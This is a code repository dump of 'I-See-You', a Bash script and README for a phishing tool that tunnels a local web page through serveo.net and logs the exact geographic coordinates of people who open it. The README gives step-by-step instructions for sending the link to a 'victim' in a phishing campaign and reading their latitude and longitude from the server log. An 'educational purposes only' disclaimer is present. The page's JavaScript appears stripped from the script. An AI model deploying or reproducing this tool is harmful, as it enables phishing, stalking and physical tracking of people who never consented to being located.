├── ISeeYou.sh └── README.md /ISeeYou.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Serveo to host page using remote port forwarding 4 | xterm -e ssh -R 80:localhost:80 serveo.net & clear 5 | 6 | 7 | echo " 8 | 9 | ██╗ ███████╗███████╗███████╗ ██╗ ██╗ ██████╗ ██╗ ██╗ 10 | ██║ ██╔════╝██╔════╝██╔════╝ ╚██╗ ██╔╝██╔═══██╗██║ ██║ 11 | ██║ ███████╗█████╗ █████╗ ╚████╔╝ ██║ ██║██║ ██║ 12 | ██║ ╚════██║██╔══╝ ██╔══╝ ╚██╔╝ ██║ ██║██║ ██║ 13 | ██║ ███████║███████╗███████╗ ██║ ╚██████╔╝╚██████╔╝ 14 | ╚═╝ ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ 15 | 16 | [+] Author: Viral Maniar 17 | [+] Twitter: @ManiarViral 18 | [+] Description: This tool uses Serveo to find the exact location of the user during social engineering or phishing engagements. 19 | 20 | " 21 | sleep 5 22 | read -p 'Enter the URL generated by Serveo: ' varurl 23 | 24 | echo " 25 | 26 | 27 | I See you! 28 | 36 | 37 | 38 | 39 | 60 | 61 | " > index.html 62 | 63 | mv index.html /var/www/html/index.html 64 | service apache2 start 65 | 66 | echo " 67 | ██╗ ███████╗███████╗███████╗ ██╗ ██╗ ██████╗ ██╗ ██╗ 68 | ██║ ██╔════╝██╔════╝██╔════╝ ╚██╗ ██╔╝██╔═══██╗██║ ██║ 69 | ██║ ███████╗█████╗ █████╗ ╚████╔╝ ██║ ██║██║ ██║ 70 | ██║ ╚════██║██╔══╝ ██╔══╝ ╚██╔╝ ██║ ██║██║ ██║ 71 | ██║ ███████║███████╗███████╗ ██║ ╚██████╔╝╚██████╔╝ 72 | ╚═╝ ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ 73 | 74 | [+] Author: Viral Maniar 75 | [+] Twitter: @ManiarViral 76 | [+] Description: This tool uses Serveo to find the exact location of the user during social engineering or phishing engagements. 77 | " > /var/log/apache2/access.log 78 | xterm -e tail -f /var/log/apache2/access.log & 79 | clear 80 | exit 81 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # I-See-You 2 | 3 | ISeeYou is a Bash and Javascript tool to find the exact location of the users during social engineering or phishing engagements. Using exact location coordinates an attacker can perform preliminary reconnaissance which will help them in performing further targeted attacks. 4 | 5 | Note:
6 | - This tool does not require any additional software to perform phishing attacks. 7 | - Users can expose their local servers to the Internet and decode the location coordinates by looking at the log file. 8 | 9 | This project must not be used for illegal purposes for stalking people or hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with. 10 | 11 | Any suggestions or ideas for this tool are welcome - just tweet me on [@ManiarViral](https://twitter.com/maniarviral) 12 | 13 | ![image](https://user-images.githubusercontent.com/3501170/55272562-2d894b80-5312-11e9-8fec-0be64a00c317.png) 14 | 15 | # How to install? 16 | 17 |
18 | git clone https://github.com/Viralmaniar/I-See-You.git
19 | cd I-See-You
20 | chmod u+x ISeeYou.sh
21 | ./ISeeYou.sh
22 | 
23 | ![image](https://user-images.githubusercontent.com/3501170/55271795-e9447e00-5306-11e9-8a52-30251d1fc156.png) 24 | 25 | # Screenshots 26 | 27 | Once the `ISeeYou.sh` is ran user sees the below screen: 28 | 29 | ![image](https://user-images.githubusercontent.com/3501170/55271919-00846b00-5309-11e9-8002-1007022ed323.png) 30 | 31 | Enter the highlighted url on the main screen where it asks for `Enter the URL generated by Serveo` and hit `Enter`: 32 | 33 | ![image](https://user-images.githubusercontent.com/3501170/55271934-3aee0800-5309-11e9-86bc-6cd1c843e635.png) 34 | 35 | This URL is generated randomly for different users. However, it will be a subdomain for the serveo.net domain. Send this URL to your victim as part of the phishing campaign via email or any other medium. Victim will see the site as below: 36 | 37 | ![image](https://user-images.githubusercontent.com/3501170/55271752-34aa5c80-5306-11e9-87b2-fa4f54321fe3.png) 38 | 39 | Note: You can be creative and modify the look and feel of the page as per your requirement. 40 | 41 | Once the targeted users allows location permission, malicious user will receive exact location of the victim in the tail screen. These numbers are `longitude and latitude` of the user. 42 | 43 | ![image](https://user-images.githubusercontent.com/3501170/55271965-cbc4e380-5309-11e9-8dca-5a1f5933c1c7.png) 44 | 45 | Using `https://maps.google.com` you can convert the `longitude and latitude` to an exact location: 46 | 47 | ![image](https://user-images.githubusercontent.com/3501170/55271991-4e4da300-530a-11e9-91ec-2fb83ef46461.png) 48 | 49 | # Copying Longitude and Latitude numbers from Xterm screens 50 | 51 | To copy between xterm and other programs - This would allow user to select numbers to be copied to the clipboard. 52 | 1. Add to the file ~/.Xresources (or create) 53 | 54 | 2. 55 |
56 | XTerm*selectToClipboard: true
57 | 
58 | 3. Then run the command: 59 |
60 | xrdb -merge ~/.Xresources
61 | 
62 | 4. Restart xterm. 63 | 64 | # Questions? 65 | 66 | Twitter: https://twitter.com/maniarviral
67 | LinkedIn: https://au.linkedin.com/in/viralmaniar 68 | 69 | # Contribution & License 70 | 71 | Creative Commons License
This work is licensed under a Creative Commons Attribution 4.0 International License.
72 | Want to contribute? Please fork it and hit up with a pull request. 73 | 74 | Any suggestions or ideas for this tool are welcome - just tweet me on [@ManiarViral](https://twitter.com/maniarviral) 75 | 76 | # Thanks 77 | 78 | Special thanks to cryptomarauder aka voidengineer 79 | --------------------------------------------------------------------------------